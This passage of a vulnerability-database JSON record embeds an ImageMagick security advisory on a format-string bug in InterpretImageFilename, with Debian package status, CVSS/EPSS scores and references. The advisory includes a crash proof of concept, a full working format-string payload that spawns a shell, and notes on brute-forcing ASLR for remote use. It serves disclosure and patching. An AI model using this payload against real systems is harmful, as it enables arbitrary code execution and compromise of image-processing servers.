"scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-56jp-jfqg-f8f4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-31853", "GHSA-56jp-jfqg-f8f4" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r3vw-ncns-cqgb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/27754?format=api", "vulnerability_id": "VCID-r889-wzc7-1yem", "summary": "ImageMagick has a Format String Bug in InterpretImageFilename leads to arbitrary code execution\n## Summary\nA format string bug vulnerability exists in `InterpretImageFilename` function where user input is directly passed to `FormatLocaleString` without proper sanitization. An attacker can overwrite arbitrary memory regions, enabling a wide range of attacks from heap overflow to remote code execution.\n<br>\n\n## Details\n### root cause\n```\nMagickExport size_t InterpretImageFilename(const ImageInfo *image_info,\n Image *image,const char *format,int value,char *filename,\n ExceptionInfo *exception)\n{\n\n...\n\n while ((cursor=strchr(cursor,'%')) != (const char *) NULL)\n {\n const char\n *q = cursor;\n\n ssize_t\n offset = (ssize_t) (cursor-format);\n\n cursor++; /* move past '%' */\n if (*cursor == '%')\n {\n /*\n Escaped %%.\n */\n cursor++;\n continue;\n }\n /*\n Skip padding digits like %03d.\n */\n if (isdigit((int) ((unsigned char) *cursor)) != 0)\n (void) strtol(cursor,(char **) &cursor,10);\n switch (*cursor)\n {\n case 'd':\n case 'o':\n case 'x':\n {\n ssize_t\n count;\n\n count=FormatLocaleString(pattern,sizeof(pattern),q,value);\n if ((count <= 0) || (count >= MagickPathExtent) ||\n ((offset+count) >= MagickPathExtent))\n return(0);\n (void) CopyMagickString(p+offset,pattern,(size_t) (MagickPathExtent-\n offset));\n cursor++;\n break;\n }\n```\nWhen the InterpretImageFilename function processes a filename beginning with format specifiers such as %d, %o, or %x, the filename string is directly passed as a parameter to the FormatLocaleString function.\n<br>\n```\nMagickExport ssize_t FormatLocaleString(char *magick_restrict string,\n const size_t length,const char *magick_restrict format,...)\n{\n ssize_t\n n;\n\n va_list\n operands;\n\n va_start(operands,format);\n n=FormatLocaleStringList(string,length,format,operands);\n va_end(operands);\n return(n);\n}\n```\n```\nMagickPrivate ssize_t FormatLocaleStringList(char *magick_restrict string,\n const size_t length,const char *magick_restrict format,va_list operands)\n{\n...\nn=(ssize_t) _vsnprintf_l(string,length,format,locale,operands);\n```\nInside FormatLocaleString, the variable argument list is initialized through va_start, after which the format string processing occurs by interpreting the format specifiers and using corresponding values from CPU registers and the call stack as arguments for the formatting operations.\n<br>\n## PoC\n### 1. Heap overflow read tested on development container\n```\nroot@9184bf32bd0f:/workspaces/ImageMagick# mogrify %o%n\n=================================================================\n==55653==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000001 at pc 0x5bdccaae689e bp 0x7fff6882c410 sp 0x7fff6882c408\nREAD of size 8 at 0x603000000001 thread T0\n #0 0x5bdccaae689d in SplaySplayTree splay-tree.c\n #1 0x5bdccaae865e in GetValueFromSplayTree (/ImageMagick/bin/magick+0x59165e) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #2 0x5bdccaa8e47b in GetImageOption (/ImageMagick/bin/magick+0x53747b) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #3 0x5bdccaa63c39 in SyncImageSettings (/ImageMagick/bin/magick+0x50cc39) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #4 0x5bdccaa63036 in AcquireImage (/ImageMagick/bin/magick+0x50c036) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #5 0x5bdccaa70cc4 in SetImageInfo (/ImageMagick/bin/magick+0x519cc4) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #6 0x5bdccae42e13 in ReadImages (/ImageMagick/bin/magick+0x8ebe13) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #7 0x5bdccb11ee08 in MogrifyImageCommand (/ImageMagick/bin/magick+0xbc7e08) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #8 0x5bdccb103ca9 in MagickCommandGenesis (/ImageMagick/bin/magick+0xbacca9) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #9 0x5bdccaa5f939 in main (/ImageMagick/bin/magick+0x508939) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #10 0x73b2102b2d8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: d5197096f709801829b118af1b7cf6631efa2dcd)\n #11 0x73b2102b2e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: d5197096f709801829b118af1b7cf6631efa2dcd)\n #12 0x5bdcca99f404 in _start (/ImageMagick/bin/magick+0x448404) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n\n0x603000000001 is located 15 bytes to the left of 24-byte region [0x603000000010,0x603000000028)\nallocated by thread T0 here:\n #0 0x5bdccaa2224e in malloc (/ImageMagick/bin/magick+0x4cb24e) (BuildId: 2e7da788e419b6541dccde47c7b6e784063d1171)\n #1 0x73b21031915a (/lib/x86_64-linux-gnu/libc.so.6+0x9015a) (BuildId: d5197096f709801829b118af1b7cf6631efa2dcd)\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow splay-tree.c in SplaySplayTree\nShadow bytes around the buggy address:\n 0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=>0x0c067fff8000:[fa]fa 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00\n 0x0c067fff8010: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa\n 0x0c067fff8020: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00\n 0x0c067fff8030: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00\n 0x0c067fff8040: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa\n 0x0c067fff8050: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n==55653==ABORTING\n```\nProcessing a malicious filename containing format string specifiers such as %d%n results in corruption of the SplayTree structure stored in the r8 register. The corrupted structure contains invalid pointer values that are later dereferenced by the SplaySplayTree function, causing the function to access unintended memory locations and triggering a heap overflow condition.\n<br>\n\n### 2. Shell execution tested on a local environment\n\nhttps://github.com/user-attachments/assets/00e6a091-8e77-48f0-959e-c05eff69ff94\n\n```\n ~/fuzz gdb -nx -args ./patchedsecure/bin/mogrify %d%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%17995c%hn%c%c%c%c%c%c%c%c%c%65529c%hn%93659c%2176\\$hn%233c%2194\\$hhnaaaaaaaaa\n```\nThe exploit achieves remote code execution by leveraging format string vulnerabilities to perform a write-what-where attack. The payload systematically overwrites return addresses on the stack, redirecting program execution to a one-gadget ROP chain that spawns a shell with the current process privileges.\n<br>\n\n**Exploitation Process:**\n1. Format string payload corrupts stack pointers through positional parameters\n2. Multiple 2-byte writes (%hn) progressively overwrite the return address \n3. Final payload redirects execution to a one-gadget (0x00007ffff66ebc85)\n4. One-gadget executes `/bin/sh` with inherited process permissions\n<br>\n\n**Remote Exploitation Feasibility:**\nWhile this PoC demonstrates local shell execution with ASLR disabled, remote code execution is achievable in real-world scenarios through brute force attacks. When stack layout conditions are favorable, attackers can perform 1.5-byte return address brute force and 1.5-byte libc base address brute force to gain shell access.\n<br>\n\n**Important:** The numeric parameters within the format string payload are environment-dependent and may require modification for different target systems due to variations in memory layout and stack structure.\n\n**Note:** This demonstrates complete system compromise, as the attacker gains interactive shell access to the target system.\n<br>\n\n## Impact\nThis format string vulnerability enables attackers to achieve complete system compromise through arbitrary memory read/write operations and remote code execution. Attackers can access sensitive data stored in process memory, overwrite critical system structures, and execute arbitrary code with ImageMagick's privileges.\n\nThe vulnerability is particularly dangerous in web applications processing user-uploaded images and automated image processing systems. Successful exploitation can lead to privilege escalation, data exfiltration, and lateral movement within compromised networks.\n<br>\n\n## Suggested Fix\n\nTwo potential mitigation approaches:\n\n1. **Input Validation**: Add format string validation in `InterpretImageFilename` to reject filenames containing format specifiers (`%n`, `%s`, `%x`, etc.) before passing to `FormatLocaleString`\n2. **Safe Parsing**: Modify the format string processing to parse and validate each format specifier individually rather than passing the entire user-controlled string directly to `FormatLocaleString`\n<br>\n\n## Credits\n### Team Daemon Fuzz Hunters\n**Bug Hunting Master Program, HSpace/Findthegap**\n<br>\n\n**Woojin Park**\n@jin-156\n[1203kids@gmail.com](mailto:1203kids@gmail.com)\n\n**Hojun Lee**\n@leehohojune \n[leehojune@korea.ac.kr](mailto:leehojune@korea.ac.kr)\n\n**Youngin Won**\n@amethyst0225\n[youngin04@korea.ac.kr](mailto:youngin04@korea.ac.kr)\n\n**Siyeon Han**\n@hanbunny\n[kokosyeon@gmail.com](mailto:kokosyeon@gmail.com)\n\n# Additional notes from the ImageMagick team:\n\nOn many modern toolchains and OSes, format‑string exploits using %n are already mitigated or blocked by default (e.g., -Wformat-security, _FORTIFY_SOURCE, hardened libc behavior, ASLR/stack canaries). That can make exploitation impractical in typical builds so you might not be vulnerable but it would still be wise to upgrade to the most recent version. We also already provide the following mitigation:\n\nTo prevent unintended interpretation of the filename as a format string, users can explicitly disable format string parsing by defining the filename as a literal. This can be done using the following directive:\n\n- In wrappers: `filename:literal`\n- From the command line: `-define filename:literal=true`", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55298.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55298.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55298", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73311", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73277", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73285", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73275", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73233", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.7324", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73259", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73211", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73185", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73221", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.73234", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00754", "scoring_system": "epss", "scoring_elements": "0.7319", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-55298" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55298", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55298" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-26T20:36:37Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/439b362b93c074eea6c3f834d84982b43ef057d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-26T20:36:37Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/439b362b93c074eea6c3f834d84982b43ef057d5" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9ccg-6pjw-x645", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-26T20:36:37Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9ccg-6pjw-x645" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55298", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55298" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111586", "reference_id": "1111586", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111586" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391097", "reference_id": "2391097", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391097" }, { "reference_url": "https://github.com/advisories/GHSA-9ccg-6pjw-x645", "reference_id": "GHSA-9ccg-6pjw-x645", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9ccg-6pjw-x645" }, { "reference_url": "https://usn.ubuntu.com/7812-1/", "reference_id": "USN-7812-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7812-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": 